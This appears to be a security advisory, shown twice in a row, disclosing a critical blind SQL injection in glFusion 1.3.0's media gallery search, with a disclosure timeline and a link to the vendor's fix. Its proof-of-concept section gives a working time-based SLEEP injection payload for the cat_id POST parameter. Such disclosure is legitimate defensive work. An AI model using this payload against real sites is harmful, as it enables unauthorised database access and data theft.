Information
--------------------
Name : SQL Injection Vulnerability in glFusion
Software : glFusion 1.3.0 and possibly below.
Vendor Homepage : http://www.glfusion.org
Vulnerability Type : Blind SQL Injection
Severity : Critical
Researcher : Omar Kurt
Advisory Reference : NS-13-009
Description
--------------------
A dynamic system based on flexible and granular permissions, with spam
protection, forums, file management, media gallery, calendars, polls,
site-wide search, RSS feeds, and more!
Details
--------------------
glFusion is affected by SQL Injection vulnerability in version 1.3.0.
Example PoC url is as follows:
Blind SQL Injection Vulnerability
http://example.com/mediagallery/search.php
POST - param:
cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
You can read the full article about SQL Injection vulnerabilities from here
:
http://www.mavitunasecurity.com/sql-injection/
Solution
--------------------
http://www.glfusion.org/article.php/glfusion131
Advisory Timeline
--------------------
05/09/2013 - First contact: No response
05/09/2013 - Vendor replied
05/09/2013 - Shared details
06/09/2013 - Fix released
09/09/2013 - Advisory Released
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.
References
--------------------
MSL Advisory Link :
https://www.mavitunasecurity.com/sql-injection-vulnerability-in-glfusion/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/
# 39806E53F1769F5D 1337day.com [2013-09-11] 18EA78711AAC8A28 #
--------------------
Name : SQL Injection Vulnerability in glFusion
Software : glFusion 1.3.0 and possibly below.
Vendor Homepage : http://www.glfusion.org
Vulnerability Type : Blind SQL Injection
Severity : Critical
Researcher : Omar Kurt
Advisory Reference : NS-13-009
Description
--------------------
A dynamic system based on flexible and granular permissions, with spam
protection, forums, file management, media gallery, calendars, polls,
site-wide search, RSS feeds, and more!
Details
--------------------
glFusion is affected by SQL Injection vulnerability in version 1.3.0.
Example PoC url is as follows:
Blind SQL Injection Vulnerability
http://example.com/mediagallery/search.php
POST - param:
cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
You can read the full article about SQL Injection vulnerabilities from here
:
http://www.mavitunasecurity.com/sql-injection/
Solution
--------------------
http://www.glfusion.org/article.php/glfusion131
Advisory Timeline
--------------------
05/09/2013 - First contact: No response
05/09/2013 - Vendor replied
05/09/2013 - Shared details
06/09/2013 - Fix released
09/09/2013 - Advisory Released
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.
References
--------------------
MSL Advisory Link :
https://www.mavitunasecurity.com/sql-injection-vulnerability-in-glfusion/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/
# 39806E53F1769F5D 1337day.com [2013-09-11] 18EA78711AAC8A28 #